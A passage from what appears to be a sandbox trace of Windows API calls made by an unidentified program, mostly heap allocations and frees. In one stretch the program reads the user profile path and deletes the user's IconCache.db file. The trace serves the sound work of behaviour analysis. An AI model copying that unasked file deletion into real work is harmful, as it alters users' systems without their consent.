Size=0x8) returned 0x24b2bb8 [0244.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0244.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0244.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0244.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0244.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0244.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0244.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0244.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0244.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0244.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0244.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0244.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0244.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0244.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0244.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0244.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0244.416] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0244.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0244.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0244.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0244.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0244.417] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8f8 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0244.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0244.417] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0244.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0244.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0244.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0244.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0244.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0244.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0244.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0244.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0244.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0244.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0244.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0244.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24f5278 [0244.419] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/IconCache.db", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpFilePart=0x8bedfc*="IconCache.db") returned 0x38 [0244.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0244.419] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db")) returned 0x2022 [0244.419] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2b9fc540, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x126775, dwReserved0=0x10da, dwReserved1=0x4, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 0xaa58e0 [0244.419] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db")) returned 1 [0244.421] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2b9fc540, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x126775, dwReserved0=0x10da, dwReserved1=0x4, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 0 [0244.421] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0244.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0244.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0244.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0244.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0244.422] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0244.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0244.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0244.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0244.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0244.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0244.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0244.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0244.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0244.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0244.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0244.422] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0244.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0244.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0244.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0244.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0244.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0244.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0244.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0244.423] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0244.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0244.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0244.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0244.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0244.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0244.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0244.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0244.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0244.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0244.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0244.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0244.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0244.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0244.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0244.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0244.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0244.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0244.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0244.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0244.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0244.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0244.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0244.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0244.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0244.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0244.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0244.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0244.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0244.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0244.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24f5278 [0244.425] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/IconCache.db", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpFilePart=0x8bf658*="IconCache.db") returned 0x38 [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0244.425] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db")) returned 0xffffffff [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0244.425] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, 